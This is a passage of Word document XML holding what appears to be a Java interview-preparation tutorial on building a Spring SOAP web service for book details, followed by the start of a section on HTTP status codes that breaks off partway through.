    <w:p w14:paraId="180354E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52DDD4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3265D6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11D9DA3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3. Define Your Web Service Endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D95206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endpoint exposes the methods that can be invoked remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08367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of a Web Service Endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1ECF4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dpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C035C7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BookEndpoint {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE3FFB" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE94D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atic final String NAMESPACE_URI = "http://example.com/webservice";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04499FB6" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1780C21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ayloadRoot(namespace = NAMESPACE_URI, localPart = "getBookDetailsRequest")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1BB7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Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A10A3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GetBookDetailsResponse getBookDetails(@RequestPayload GetBookDetailsRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112895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GetBookDetailsResponse response = new GetBookDetailsResponse();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CD8C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BookTitle("Introduction to SOAP");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168621C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Author("John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA28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Price(29.99);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10772D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sponse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717FEA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E903C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E6E0EC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Endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks the class as an endpoint for handling SOAP messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39FA7A"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PayloadRoot</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the namespace and the local part of the request message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B02D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questPayload</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Binds the SOAP request object to the method parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB9013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sponsePayload</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies that the return value of the method will be used as the SOAP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7098A4"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4. Create Request and Response Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C70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se classes represent the request and response XML structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388707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quest Class (GetBookDetailsRequest.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3754A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quest")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B64E8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quest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF40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Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6991DA95" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7B71E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Id() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC7FD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Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551DA7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036BBE9" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED381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Id(String bookId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331664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Id = bookId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D104C6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54F05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38DE9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sponse Class (GetBookDetailsResponse.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263636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sponse")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF71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sponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FDEF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Title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A50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author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50A8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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362DE05" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EC27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Title() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A40C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Title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871E3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4370E61" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2F66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Title(String bookTitle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D86A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Title = bookTitle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3BB3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2F5B2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F585B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Author() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC19D3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author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB84B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2226DAE0" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A78B8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Author(String author) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0B72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author = author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9FF9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D4155D2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E864A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ouble getPrice() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D273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price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499DC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DA5EE23" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AD7EF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Price(double price) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECCA2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price = price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521447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6EF8E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5CE44E2C"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5. Configure Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97D68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n Spring-based applications, you need to configure the SOAP service to listen to incoming requests and send appropriate responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050D21F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Configuration Class (WebServiceConfig.java)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD4B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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B97627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ableWs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A93B4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WebServiceConfig extends WsConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C542102" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32831A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6A8E13A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ervletRegistrationBean messageDispatcherServlet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679468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ServletRegistrationBean registrationBean = new ServletRegistrationBean(new MessageDispatcherServlet(), "/ws/*");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379BBE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gistrationBean.setLoadOnStartup(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029AE9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gistrationBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B70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9A5BDF2" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0674BAF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473660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efaultWsdl11Definition defaultWsdl11Definition(XsdSchema bookSchema) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11269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DefaultWsdl11Definition wsdl11Definition = new DefaultWsdl11Definition();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901B58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PortTypeName("BookServicePort");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E245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LocationUri("/ws");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4A9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TargetNamespace("http://example.com/webservice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414268D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Schema(bookSchema);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBCFD5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wsdl11Definition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4EAD8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1649246" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4C6D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70FFB16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XsdSchema bookSchema() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C46CD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new SimpleXsdSchema(new ClassPathResource("book.xsd"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635539E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579C4F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22AA89FA"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EnableWs</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enables Spring Web Services configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C10A5"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messageDispatcherServlet()</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Registers a MessageDispatcherServlet to handle incoming SOAP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49972EBB"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defaultWsdl11Definition()</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the WSDL (Web Services Description Language) for the service and its port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E89CE4"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bookSchema()</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the XML Schema (XSD) for the book data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7B251"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6. Create the XSD Schema (book.xsd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE09EF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XML schema defines the structure of the request and response messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E9BB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lastRenderedPageBreak/>
        <w:t>Example of XSD (book.xsd)</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE92B6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2E32D96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 xmlns:xs="http://www.w3.org/2001/XMLSchema"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCBD74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argetNamespace="http://example.com/webservice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0DBC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tns="http://example.com/webservice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF4CD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elementFormDefault="qualified"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32C778" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131AFC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quest"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5452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76DD6B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2772347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Id" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352A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73FF0C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A9618F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0B47DC80" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE2D3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sponse"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB189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07A629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42262F7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Title" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF81A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author" type="xs:string"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421445F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price" type="xs:decimal"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE10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6254D49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6B6D2EB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56A5748C" w14:textId="77777777" w:rsidR="008D1C17" w:rsidRPr="00585961" w:rsidRDefault="008D1C17" w:rsidP="00585961">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247511E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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B913F"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7. Run and Test the SOAP Web Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3FF3AF"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Run the application as a Spring Boot application or deploy it to a servlet container (such as Tomcat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274333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he SOAP service will be accessible at http://localhost:8080/ws (assuming default settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE09D1"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You can access the WSDL by navigating to http://localhost:8080/ws/BookService.wsdl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B774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est the service using SOAP tools like SoapUI or Postman, providing the correct SOAP request and expecting the appropriate response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BF5A0"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8. SOAP Request Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795AC74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quest that the client would send:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9AD11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10536B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6B5EE7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32D802B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23ECFE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55DBDF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F13EE8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Id&gt;12345&lt;/web:bookId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2E71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C5952B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39C761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30F2FF8D"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9. SOAP Response Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75429E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sponse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CABC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57B15CB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4A3FE33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0FFC17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55142E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0243904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750212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Title&gt;Introduction to SOAP&lt;/web:bookTitle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CB53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author&gt;John Doe&lt;/web:author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A415DB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price&gt;29.99&lt;/web:price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B61C9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6D747DA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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2905B9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5BA2910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By following these steps, you can create and expose a SOAP web service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9BA75" w14:textId="77777777" w:rsidR="00E41215"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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13403177" w14:textId="10099C37" w:rsidR="00E41215" w:rsidRPr="00CE4B95" w:rsidRDefault="00E41215" w:rsidP="00E41215">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="_Toc197867636"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is HTTP status code and explain all status codes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
    </w:p>
    <w:p w14:paraId="5D0BEB3A" w14:textId="4D8C293E" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00092EDE" w:rsidP="004C7374">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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HTTP Status Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BE8B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HTTP status codes are three-digit numbers returned by a web server to indicate the result of an HTTP request. These codes are grouped into five categories based on the type of response they represent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B7A63"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 (Informational)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request was received, and the server is processing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230313DD"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 (Successful)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request was successfully received, understood, and processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DCE57"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 (Redirection)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Further action is required to complete the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A81BD44"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 (Client Error)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request contains bad syntax or cannot be fulfilled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E46B57E"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 (Server Error)</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server failed to fulfill a valid request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AD69C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List of Common HTTP Status Codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0E52B"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1xx - Informational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F247A95"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0 Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has received the request headers, and the client should proceed to send the request body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357FAFC6"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1 Switching Protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is switching protocols as per the client's request (e.g., switching to WebSocket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E870C54"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2 Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has received and is processing the request, but no response is yet available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0E4B5"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2xx - Successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82C6B3"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0 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has succeeded. The meaning of "success" varies depending on the HTTP method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D9DCA"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource is returned in the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B2346"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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has been created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F352CEB"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1 Created</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
